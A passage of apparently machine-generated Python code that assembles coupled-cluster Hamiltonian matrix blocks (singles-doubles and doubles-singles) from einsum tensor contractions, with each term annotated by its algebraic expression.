# 1.0000 d(e,a)*d(m,j)*<i,k||c,b>*t1(c,k)
Hsd += 1.000000000000000 * einsum('ea,mj,ikcb,ck->emabij', kd[v, v], kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,b)*<i,j||c,a>*t1(c,m)
Hsd += 1.000000000000000 * einsum('eb,ijca,cm->emabij', kd[v, v], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*<i,j||c,b>*t1(c,m)
Hsd += -1.000000000000000 * einsum('ea,ijcb,cm->emabij', kd[v, v], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,i)*<j,k||a,b>*t1(e,k)
Hsd += 1.000000000000000 * einsum('mi,jkab,ek->emabij', kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(m,j)*<i,k||a,b>*t1(e,k)
Hsd += -1.000000000000000 * einsum('mj,ikab,ek->emabij', kd[o, o], g[o, o, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# H(m,n,e,f;i,a) = <0|e2(m,n,f,e) e(-T) H e(T) e1(a,i)|0>
# -1.0000 d(f,a)*d(m,i)*f(e,n)
Hds = -1.000000000000000 * einsum('fa,mi,en->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(n,i)*f(e,m)
Hds += 1.000000000000000 * einsum('fa,ni,em->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(e,a)*d(m,i)*f(f,n)
Hds += 1.000000000000000 * einsum('ea,mi,fn->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# -1.0000 d(e,a)*d(n,i)*f(f,m)
Hds += -1.000000000000000 * einsum('ea,ni,fm->efmnai', kd[v, v], kd[o, o], f[v, o], optimize=['einsum_path', (0, 1, 2)])
# 1.0000 d(f,a)*d(m,i)*f(j,n)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,mi,jn,ej->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,n)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,mi,jn,fj->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,m)*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ni,jm,ej->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,m)*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ni,jm,fj->efmnai', kd[v, v], kd[o, o], f[o, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*f(e,b)*t1(b,n)
Hds += -1.000000000000000 * einsum('fa,mi,eb,bn->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*f(e,b)*t1(b,m)
Hds += 1.000000000000000 * einsum('fa,ni,eb,bm->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*f(f,b)*t1(b,n)
Hds += 1.000000000000000 * einsum('ea,mi,fb,bn->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*f(f,b)*t1(b,m)
Hds += -1.000000000000000 * einsum('ea,ni,fb,bm->efmnai', kd[v, v], kd[o, o], f[v, v], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*f(j,b)*t2(b,e,n,j)
Hds += 1.000000000000000 * einsum('fa,mi,jb,benj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,b)*t2(b,e,m,j)
Hds += -1.000000000000000 * einsum('fa,ni,jb,bemj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(f,a)*f(i,b)*t2(b,e,m,n)
Hds += 1.000000000000000 * einsum('fa,ib,bemn->efmnai', kd[v, v], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,b)*t2(b,f,n,j)
Hds += -1.000000000000000 * einsum('ea,mi,jb,bfnj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,b)*t2(b,f,m,j)
Hds += 1.000000000000000 * einsum('ea,ni,jb,bfmj->efmnai', kd[v, v], kd[o, o], f[o, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(e,a)*f(i,b)*t2(b,f,m,n)
Hds += -1.000000000000000 * einsum('ea,ib,bfmn->efmnai', kd[v, v], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(m,i)*f(j,a)*t2(e,f,n,j)
Hds += 1.000000000000000 * einsum('mi,ja,efnj->efmnai', kd[o, o], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(n,i)*f(j,a)*t2(e,f,m,j)
Hds += -1.000000000000000 * einsum('ni,ja,efmj->efmnai', kd[o, o], f[o, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(f,a)*d(m,i)*f(j,b)*t1(b,n)*t1(e,j)
Hds += 1.000000000000000 * einsum('fa,mi,jb,bn,ej->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(m,i)*f(j,b)*t1(b,n)*t1(f,j)
Hds += -1.000000000000000 * einsum('ea,mi,jb,bn,fj->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*d(n,i)*f(j,b)*t1(b,m)*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ni,jb,bm,ej->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(n,i)*f(j,b)*t1(b,m)*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ni,jb,bm,fj->efmnai', kd[v, v], kd[o, o], f[o, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*<i,e||m,n>
Hds += 1.000000000000000 * einsum('fa,iemn->efmnai', kd[v, v], g[o, v, o, o])
# -1.0000 d(e,a)*<i,f||m,n>
Hds += -1.000000000000000 * einsum('ea,ifmn->efmnai', kd[v, v], g[o, v, o, o])
# 1.0000 d(m,i)*<e,f||a,n>
Hds += 1.000000000000000 * einsum('mi,efan->efmnai', kd[o, o], g[v, v, v, o])
# -1.0000 d(n,i)*<e,f||a,m>
Hds += -1.000000000000000 * einsum('ni,efam->efmnai', kd[o, o], g[v, v, v, o])
# -1.0000 d(f,a)*<i,j||m,n>*t1(e,j)
Hds += -1.000000000000000 * einsum('fa,ijmn,ej->efmnai', kd[v, v], g[o, o, o, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||m,n>*t1(f,j)
Hds += 1.000000000000000 * einsum('ea,ijmn,fj->efmnai', kd[v, v], g[o, o, o, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,n>*t1(b,j)
Hds += -1.000000000000000 * einsum('fa,mi,jebn,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(m,n)d(f,a)*<i,e||b,n>*t1(b,m)
contracted_intermediate = 1.000000000000000 * einsum('fa,iebn,bm->efmnai', kd[v, v], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 1.0000 P(e,f)d(m,i)*<j,e||a,n>*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('mi,jean,fj->efmnai', kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(f,a)*d(n,i)*<j,e||b,m>*t1(b,j)
Hds += 1.000000000000000 * einsum('fa,ni,jebm,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(e,f)d(n,i)*<j,e||a,m>*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('ni,jeam,fj->efmnai', kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(e,a)*d(m,i)*<j,f||b,n>*t1(b,j)
Hds += 1.000000000000000 * einsum('ea,mi,jfbn,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(m,n)d(e,a)*<i,f||b,n>*t1(b,m)
contracted_intermediate = -1.000000000000000 * einsum('ea,ifbn,bm->efmnai', kd[v, v], g[o, v, v, o], t1, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -1.0000 d(e,a)*d(n,i)*<j,f||b,m>*t1(b,j)
Hds += -1.000000000000000 * einsum('ea,ni,jfbm,bj->efmnai', kd[v, v], kd[o, o], g[o, v, v, o], t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 d(m,i)*<e,f||b,a>*t1(b,n)
Hds += -1.000000000000000 * einsum('mi,efba,bn->efmnai', kd[o, o], g[v, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 1.0000 d(n,i)*<e,f||b,a>*t1(b,m)
Hds += 1.000000000000000 * einsum('ni,efba,bm->efmnai', kd[o, o], g[v, v, v, v], t1, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(f,a)*d(m,i)*<k,j||b,n>*t2(b,e,k,j)
Hds += 0.500000000000000 * einsum('fa,mi,kjbn,bekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -1.0000 P(m,n)d(f,a)*<i,j||b,n>*t2(b,e,m,j)
contracted_intermediate = -1.000000000000000 * einsum('fa,ijbn,bemj->efmnai', kd[v, v], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(e,a)*d(m,i)*<k,j||b,n>*t2(b,f,k,j)
Hds += -0.500000000000000 * einsum('ea,mi,kjbn,bfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 1.0000 P(m,n)d(e,a)*<i,j||b,n>*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ea,ijbn,bfmj->efmnai', kd[v, v], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(m,i)*<k,j||a,n>*t2(e,f,k,j)
Hds += 0.500000000000000 * einsum('mi,kjan,efkj->efmnai', kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 P(m,n)<i,j||a,n>*t2(e,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('ijan,efmj->efmnai', g[o, o, v, o], t2)
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(f,a)*d(n,i)*<k,j||b,m>*t2(b,e,k,j)
Hds += -0.500000000000000 * einsum('fa,ni,kjbm,bekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(e,a)*d(n,i)*<k,j||b,m>*t2(b,f,k,j)
Hds += 0.500000000000000 * einsum('ea,ni,kjbm,bfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(n,i)*<k,j||a,m>*t2(e,f,k,j)
Hds += -0.500000000000000 * einsum('ni,kjam,efkj->efmnai', kd[o, o], g[o, o, v, o], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# 0.5000 d(f,a)*d(m,i)*<j,e||b,c>*t2(b,c,n,j)
Hds += 0.500000000000000 * einsum('fa,mi,jebc,bcnj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(f,a)*d(n,i)*<j,e||b,c>*t2(b,c,m,j)
Hds += -0.500000000000000 * einsum('fa,ni,jebc,bcmj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(f,a)*<i,e||b,c>*t2(b,c,m,n)
Hds += 0.500000000000000 * einsum('fa,iebc,bcmn->efmnai', kd[v, v], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 P(e,f)d(m,i)*<j,e||b,a>*t2(b,f,n,j)
contracted_intermediate = -1.000000000000000 * einsum('mi,jeba,bfnj->efmnai', kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)d(n,i)*<j,e||b,a>*t2(b,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ni,jeba,bfmj->efmnai', kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -1.0000 P(e,f)<i,e||b,a>*t2(b,f,m,n)
contracted_intermediate = -1.000000000000000 * einsum('ieba,bfmn->efmnai', g[o, v, v, v], t2)
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -0.5000 d(e,a)*d(m,i)*<j,f||b,c>*t2(b,c,n,j)
Hds += -0.500000000000000 * einsum('ea,mi,jfbc,bcnj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# 0.5000 d(e,a)*d(n,i)*<j,f||b,c>*t2(b,c,m,j)
Hds += 0.500000000000000 * einsum('ea,ni,jfbc,bcmj->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 1)])
# -0.5000 d(e,a)*<i,f||b,c>*t2(b,c,m,n)
Hds += -0.500000000000000 * einsum('ea,ifbc,bcmn->efmnai', kd[v, v], g[o, v, v, v], t2, optimize=['einsum_path', (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t2(c,e,n,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbc,bj,cenk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t2(c,e,m,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbc,bj,cemk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*<i,j||b,c>*t1(b,j)*t2(c,e,m,n)
Hds += -1.000000000000000 * einsum('fa,ijbc,bj,cemn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t2(c,f,n,k)
Hds += 1.000000000000000 * einsum('ea,mi,kjbc,bj,cfnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,j)*t2(c,f,m,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbc,bj,cfmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,j||b,c>*t1(b,j)*t2(c,f,m,n)
Hds += 1.000000000000000 * einsum('ea,ijbc,bj,cfmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(m,i)*<k,j||b,a>*t1(b,j)*t2(e,f,n,k)
Hds += -1.000000000000000 * einsum('mi,kjba,bj,efnk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(n,i)*<k,j||b,a>*t1(b,j)*t2(e,f,m,k)
Hds += 1.000000000000000 * einsum('ni,kjba,bj,efmk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,n)*t2(c,e,k,j)
Hds += -0.500000000000000 * einsum('fa,mi,kjbc,bn,cekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 1.0000 P(m,n)d(f,a)*<i,j||b,c>*t1(b,n)*t2(c,e,m,j)
contracted_intermediate = 1.000000000000000 * einsum('fa,ijbc,bn,cemj->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,n)*t2(c,f,k,j)
Hds += 0.500000000000000 * einsum('ea,mi,kjbc,bn,cfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -1.0000 P(m,n)d(e,a)*<i,j||b,c>*t1(b,n)*t2(c,f,m,j)
contracted_intermediate = -1.000000000000000 * einsum('ea,ijbc,bn,cfmj->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -0.5000 d(m,i)*<k,j||b,a>*t1(b,n)*t2(e,f,k,j)
Hds += -0.500000000000000 * einsum('mi,kjba,bn,efkj->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 P(m,n)<i,j||b,a>*t1(b,n)*t2(e,f,m,j)
contracted_intermediate = 1.000000000000000 * einsum('ijba,bn,efmj->efmnai', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 0.5000 d(f,a)*d(n,i)*<k,j||b,c>*t1(b,m)*t2(c,e,k,j)
Hds += 0.500000000000000 * einsum('fa,ni,kjbc,bm,cekj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,i)*<k,j||b,c>*t1(b,m)*t2(c,f,k,j)
Hds += -0.500000000000000 * einsum('ea,ni,kjbc,bm,cfkj->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(n,i)*<k,j||b,a>*t1(b,m)*t2(e,f,k,j)
Hds += 0.500000000000000 * einsum('ni,kjba,bm,efkj->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -0.5000 d(f,a)*d(m,i)*<k,j||b,c>*t1(e,j)*t2(b,c,n,k)
Hds += -0.500000000000000 * einsum('fa,mi,kjbc,ej,bcnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(f,a)*d(n,i)*<k,j||b,c>*t1(e,j)*t2(b,c,m,k)
Hds += 0.500000000000000 * einsum('fa,ni,kjbc,ej,bcmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(f,a)*<i,j||b,c>*t1(e,j)*t2(b,c,m,n)
Hds += -0.500000000000000 * einsum('fa,ijbc,ej,bcmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 P(e,f)d(m,i)*<k,j||b,a>*t1(e,j)*t2(b,f,n,k)
contracted_intermediate = 1.000000000000000 * einsum('mi,kjba,ej,bfnk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# -1.0000 P(e,f)d(n,i)*<k,j||b,a>*t1(e,j)*t2(b,f,m,k)
contracted_intermediate = -1.000000000000000 * einsum('ni,kjba,ej,bfmk->efmnai', kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)<i,j||b,a>*t1(e,j)*t2(b,f,m,n)
contracted_intermediate = 1.000000000000000 * einsum('ijba,ej,bfmn->efmnai', g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 0.5000 d(e,a)*d(m,i)*<k,j||b,c>*t1(f,j)*t2(b,c,n,k)
Hds += 0.500000000000000 * einsum('ea,mi,kjbc,fj,bcnk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# -0.5000 d(e,a)*d(n,i)*<k,j||b,c>*t1(f,j)*t2(b,c,m,k)
Hds += -0.500000000000000 * einsum('ea,ni,kjbc,fj,bcmk->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t2, optimize=['einsum_path', (0, 1), (0, 2), (0, 2), (0, 1)])
# 0.5000 d(e,a)*<i,j||b,c>*t1(f,j)*t2(b,c,m,n)
Hds += 0.500000000000000 * einsum('ea,ijbc,fj,bcmn->efmnai', kd[v, v], g[o, o, v, v], t1, t2, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,n>*t1(b,j)*t1(e,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbn,bj,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,n>*t1(b,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('ea,mi,kjbn,bj,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 P(m,n)d(f,a)*<i,j||b,n>*t1(b,m)*t1(e,j)
contracted_intermediate = -1.000000000000000 * einsum('fa,ijbn,bm,ej->efmnai', kd[v, v], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# 1.0000 P(m,n)d(e,a)*<i,j||b,n>*t1(b,m)*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('ea,ijbn,bm,fj->efmnai', kd[v, v], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->efnmai', contracted_intermediate)
# -1.0000 d(m,i)*<k,j||a,n>*t1(e,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('mi,kjan,ej,fk->efmnai', kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<k,j||b,m>*t1(b,j)*t1(e,k)
Hds += 1.000000000000000 * einsum('fa,ni,kjbm,bj,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<k,j||b,m>*t1(b,j)*t1(f,k)
Hds += -1.000000000000000 * einsum('ea,ni,kjbm,bj,fk->efmnai', kd[v, v], kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(n,i)*<k,j||a,m>*t1(e,j)*t1(f,k)
Hds += 1.000000000000000 * einsum('ni,kjam,ej,fk->efmnai', kd[o, o], g[o, o, v, o], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<j,e||b,c>*t1(b,j)*t1(c,n)
Hds += -1.000000000000000 * einsum('fa,mi,jebc,bj,cn->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(f,a)*d(n,i)*<j,e||b,c>*t1(b,j)*t1(c,m)
Hds += 1.000000000000000 * einsum('fa,ni,jebc,bj,cm->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(f,a)*<i,e||b,c>*t1(b,n)*t1(c,m)
Hds += -1.000000000000000 * einsum('fa,iebc,bn,cm->efmnai', kd[v, v], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 P(e,f)d(m,i)*<j,e||b,a>*t1(b,n)*t1(f,j)
contracted_intermediate = -1.000000000000000 * einsum('mi,jeba,bn,fj->efmnai', kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 P(e,f)d(n,i)*<j,e||b,a>*t1(b,m)*t1(f,j)
contracted_intermediate = 1.000000000000000 * einsum('ni,jeba,bm,fj->efmnai', kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
Hds += 1.00000 * contracted_intermediate + -1.00000 * einsum('efmnai->femnai', contracted_intermediate)
# 1.0000 d(e,a)*d(m,i)*<j,f||b,c>*t1(b,j)*t1(c,n)
Hds += 1.000000000000000 * einsum('ea,mi,jfbc,bj,cn->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# -1.0000 d(e,a)*d(n,i)*<j,f||b,c>*t1(b,j)*t1(c,m)
Hds += -1.000000000000000 * einsum('ea,ni,jfbc,bj,cm->efmnai', kd[v, v], kd[o, o], g[o, v, v, v], t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 2), (0, 1)])
# 1.0000 d(e,a)*<i,f||b,c>*t1(b,n)*t1(c,m)
Hds += 1.000000000000000 * einsum('ea,ifbc,bn,cm->efmnai', kd[v, v], g[o, v, v, v], t1, t1, optimize=['einsum_path', (1, 2), (1, 2), (0, 1)])
# -1.0000 d(f,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,n)*t1(e,k)
Hds += -1.000000000000000 * einsum('fa,mi,kjbc,bj,cn,ek->efmnai', kd[v, v], kd[o, o], g[o, o, v, v], t1, t1, t1, optimize=['einsum_path', (0, 1), (0, 1), (0, 3), (0, 2), (0, 1)])
# 1.0000 d(e,a)*d(m,i)*<k,j||b,c>*t1(b,j)*t1(c,n)*t1(f,k)
